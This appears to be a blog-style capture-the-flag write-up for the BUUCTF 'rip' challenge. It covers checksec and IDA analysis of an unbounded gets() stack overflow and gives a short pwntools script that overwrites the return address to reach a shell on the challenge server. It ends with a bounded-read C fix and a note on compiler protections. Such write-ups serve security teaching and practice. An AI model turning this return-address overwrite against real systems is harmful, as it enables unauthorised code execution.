BUUCTF -rip
2022-07-23 23:32:00 【Long street 395】
1. Inspect the file
First run file ./pwn1 to check the file type, then checksec --file=pwn1 to check the binary's protections.


Result: a 64-bit binary with no protections enabled.
2. Decompile with IDA
Open pwn1 in IDA Pro (64-bit) and press F5 to decompile, then look at the main function. gets() reads input into the variable s, which is only 0xf (15) bytes long on the stack, but gets() places no limit on the input length, so there is an obvious stack overflow vulnerability.
In the Functions window you can see there is a fun() function:
The starting address of fun() is 0x401186.
3. Code
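from pwn import *
# remote() opens a remote connection; specify the IP and port
io = remote('node4.buuoj.cn', 25649)
# Fill s (0xf bytes) and the saved rbp (0x8 bytes), then overwrite the return address.
# Note: 0x40118A lies 4 bytes past fun()'s entry at 0x401186.
payload = b'a'*(0xf + 0x8) + p64(0x40118A)
io.sendline(payload)  # send the data
io.interactive()  # interact with the shell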
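The root cause found in main is the unbounded gets() call, and the fix is a read that is told the buffer size. The following is an added example, not code from the challenge binary or from the original post; read_line_bounded, the LINE_* status codes and the 15-byte buffer are assumptions modelled on the decompilation described above.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern described in the write-up (shown only as a comment;
 * gets() was removed in C11 because it cannot be told the buffer size):
 *     char s[15];
 *     gets(s);
 */

enum { LINE_OK = 0, LINE_TRUNCATED = 1, LINE_EOF = -1 };

/* Hypothetical helper: read one line into buf (cap bytes including NUL).
 * Never writes past buf. If the line is longer than the buffer, the excess
 * is discarded so it is not mistaken for the next line of input. */
int read_line_bounded(FILE *in, char *buf, size_t cap)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return LINE_EOF;

    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {   /* the whole line fit */
        buf[n - 1] = '\0';
        return LINE_OK;
    }

    /* No newline stored: input ended, or the line was too long. */
    int c, dropped = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        dropped = 1;
    return dropped ? LINE_TRUNCATED : LINE_OK;
}

int main(void)
{
    char s[15];                          /* same size as s in the challenge */
    int rc = read_line_bounded(stdin, s, sizeof s);
    if (rc == LINE_EOF)
        return 1;
    if (rc == LINE_TRUNCATED)
        fputs("input too long, truncated\n", stderr);
    printf("got: %s\n", s);
    return 0;
}
```

Building with the protections that checksec reported as disabled (stack canary, PIE, NX) limits the impact of any remaining memory-safety bug, but the bounded read is what removes this one.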

